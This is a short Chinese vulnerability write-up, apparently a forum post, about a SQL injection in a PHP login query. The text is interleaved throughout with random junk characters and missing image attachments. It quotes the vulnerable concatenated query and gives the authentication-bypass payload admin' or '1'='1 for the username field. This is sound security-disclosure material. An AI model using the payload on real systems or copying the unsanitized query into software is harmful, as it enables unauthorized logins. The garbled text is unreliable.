8 l( ]* {! D9 j% ?6 w& D 复制代码 . F' p% ~6 S/ }% c( z3 b经典语句重现
$sqlQuery = " SELECT use_id,use_name,use_email FROM ".SQL_PREFIX."user WHERE use_name= '".$use_nameval."' AND use_pwd = '".md5($use_pwdval)."' and use_enabled = 1 LIMIT 1 ";% c1 x3 m+ C. P8 A
# Z b4 g: g# e/ r; Q$ z3 w; V+ _0 q 复制代码- H; y6 m* {) b
原本以为注释就完事了 后来发现被过滤l 再看funpost函数 ) r3 _; J7 x/ _. x. @/ n7 B7 _3 S' g: i4 w' i v
[attach]270[/attach]! ?7 f$ s- p2 z* z6 [
& X0 L% B: b* e( v# B0x03 漏洞证明: 1 o' ?) R* S+ u: N' W4 ~# v" g9 y登录用户处填写 admin' or '1'='1 - d% i) {1 ^! J: R$ e( G+ }1 W
7 m1 B" c; S' z[attach]273[/attach] 7 {( h) V6 N- Z4 O/ K' M% Y ~% _: Z. C
& [1 s4 X. A$ E